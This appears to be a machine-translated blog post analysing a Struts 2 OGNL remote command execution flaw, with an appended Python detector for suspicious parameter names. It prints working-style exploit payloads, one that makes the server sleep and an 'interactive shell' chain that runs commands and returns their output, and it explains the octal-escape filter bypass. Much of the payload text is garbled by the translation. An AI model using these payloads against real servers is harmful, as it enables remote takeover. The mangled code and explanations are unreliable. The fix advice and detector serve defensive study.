Struts2 Remote Command Execution Vulnerability Analysis and Prevention

Source: Internet
Author: User

Struts 2 is a framework that combines Struts and WebWork technologies. Its architecture differs significantly from Struts 1: Struts 2 uses WebWork as its core and an interceptor mechanism to process user requests. This design also decouples the business logic controller completely from the Servlet API, so Struts 2 can be understood as an updated WebWork.
 
Recently a remote command execution vulnerability was found in Struts 2, and the many versions of exploitation tools circulating for it have caused CNVD considerable pain. The following walks through how this vulnerability is analyzed.
 
Submitting the request via POST bypasses part of the filtering applied to input parameters.
 
('\ 43_memberaccess.allowstaticmethodaccess') (a) = true & (B) (' \ 43 context [\ 'xwork. methodAccessor. denyMethodExecution \ '] \ 75false') (B) & ('\ 43c') ('\ 43_memberAccess.excludeProperties \ 75@java.util.Collections @ EMPTY_SET') (c) & (d) ('@ java. lang. thread @ sleep (8000) ') (d ))
The current thread sleeps for 8 seconds.
Command execution is performed mainly through static methods reached via the OGNL context object.
For example: @runtime@getruntime(cmd.exe c
@Class@method is the OGNL syntax for static method access.
For xwork to execute the OGNL statement, the variable name must contain #. This was previously bypassed with \u0023 (the hexadecimal unicode escape); the official patch blocks that form, but it can still be bypassed with \43 (the octal escape).
 
Interactive shell:
('\ 43_memberaccess.allowstaticmethodaccess') (a) = true & (B) (' \ 43 context [\ 'xwork. methodAccessor. denyMethodExecution \ '] \ 75false') (B) & ('\ 43c') ('\ 43_memberAccess.excludeProperties \ 75@java.util.Collections @ EMPTY_SET') (c) & (g) ('\ 43mycmd \ 75 \ 'ls \ 40 \ u002dl \ '') (d) & (h) (' \ 43myret \ 75@java.lang.runtime@getruntime(cmd.exe c (\ 43 mycmd) ') (d) & (I) (' \ 43mydat \ 75new \ 40java. io. dataInputStream (\ 43myret. getInputStream () ') (d) & (j) (' \ 43myres \ 75new \ 40 byte [51020] ') (d) & (k) ('\ 43mydat. readFully (\ 43 myres) ') (d) & (l) (' \ 43mystr \ 75new \ 40java. lang. string (\ 43 myres) ') (d) & (m) (' \ 43myout \ 75@org.apache.struts2.ServletActionContext @ getResponse () ') (d) & (n) ('\ 43myout. getWriter (). println (\ 43 mystr) ') (d ))
 
\75 is the octal escape for = and \40 is the octal escape for a space: the parameters passed into the OGNL statement cannot contain literal spaces (or certain other characters).
The regular expression in the old version rejects the characters # = : (and whitespace), and \40 is what gets past that block.
 
In summary, the payload above does the following:
1. Sets context denyMethodExecution = false so that methods may run.
2. Sets excludeProperties = @java.util.Collections@EMPTY_SET (the @Class@field form reads a static variable), i.e. clears the external interceptor's exclusion set.
3. mycmd = "ls -l" defines the variable holding the command to execute.
4. myret = @java.lang.runtime@getruntime(cmd.exe c (#mycmd)) calls the static method to execute our variable.
5. mydat = new java.io.DataInputStream(#myret.getInputStream()) obtains the input stream.
6. myres = new byte[51020]; mydat.readFully(myres); reads the input stream
(steps 5 and 6 convert the input stream type).
7. mystr = new java.lang.String(#myres); defines a string and assigns the stream contents to it.
8. myout = @org.apache.struts2.ServletActionContext@getResponse(); gets the response object.
9. myout.getWriter().println(#mystr); prints the result into the response, i.e. onto the screen.
 

 
Struts2 vulnerability fix:
 
Download the latest version, 2.3.4: http://struts.apache.org/download.cgi#struts234
 
Or modify the OGNL handling logic in the corresponding jar, then recompile and repackage it to replace the old file.
 
For a WAF or similar, the safe choice is to keep only letters and digits in parameter names and drop everything else. Suggestions for better fixes are welcome.
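As an added defensive example (not code from the original post), the following Python checks request parameter names the way a WAF rule or log filter would: it undoes URL encoding, then the OGNL octal and \u escapes discussed above, and only then looks for # @ = : or whitespace. The sample request body is constructed for the demonstration and the marker set is my assumption.

```python
import re
from urllib.parse import unquote

# Java/OGNL string-literal escapes: octal (\NNN, at most \377) and \uXXXX.
_OCTAL = re.compile(r"\\([0-3][0-7]{2}|[0-7]{1,2})")
_UNICODE = re.compile(r"\\u([0-9a-fA-F]{4})")

# Characters that never belong in an ordinary form-field name but are the
# building blocks of an OGNL expression: '#' (context), '@' (static access),
# '=' (assignment) and ':' (the old regex on this page already refused # = :).
# Assumed marker set for the demonstration.
OGNL_MARKERS = set("#@=:")


def decode_ognl_escapes(text: str) -> str:
    """Resolve \\uXXXX and octal escapes the way OGNL would inside a quoted literal."""
    text = _UNICODE.sub(lambda m: chr(int(m.group(1), 16)), text)
    return _OCTAL.sub(lambda m: chr(int(m.group(1), 8)), text)


def suspicious_param_names(query_string: str) -> list:
    """Return the parameter names that carry OGNL markers or whitespace once escapes are undone."""
    findings = []
    for pair in query_string.split("&"):
        raw_name = pair.split("=", 1)[0]
        name = unquote(raw_name)              # undo URL encoding first
        decoded = decode_ognl_escapes(name)   # then undo OGNL escapes
        markers = sorted(OGNL_MARKERS & set(decoded))
        if markers or any(ch.isspace() for ch in decoded):
            findings.append({"raw": raw_name, "decoded": decoded, "markers": markers})
    return findings


# Constructed sample: one benign parameter and one using the octal bypass.
SAMPLE_BODY = "user=alice&('\\43_memberAccess.allowStaticMethodAccess')(a)=true"

if __name__ == "__main__":
    for f in suspicious_param_names(SAMPLE_BODY):
        print(f"{f['raw']!r} -> {f['decoded']!r} markers={f['markers']}")
```

A rule that only inspects the raw bytes for # would miss the \43 form; normalizing first is what makes the "letters and digits only" policy above enforceable.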

From shoushou's Blog
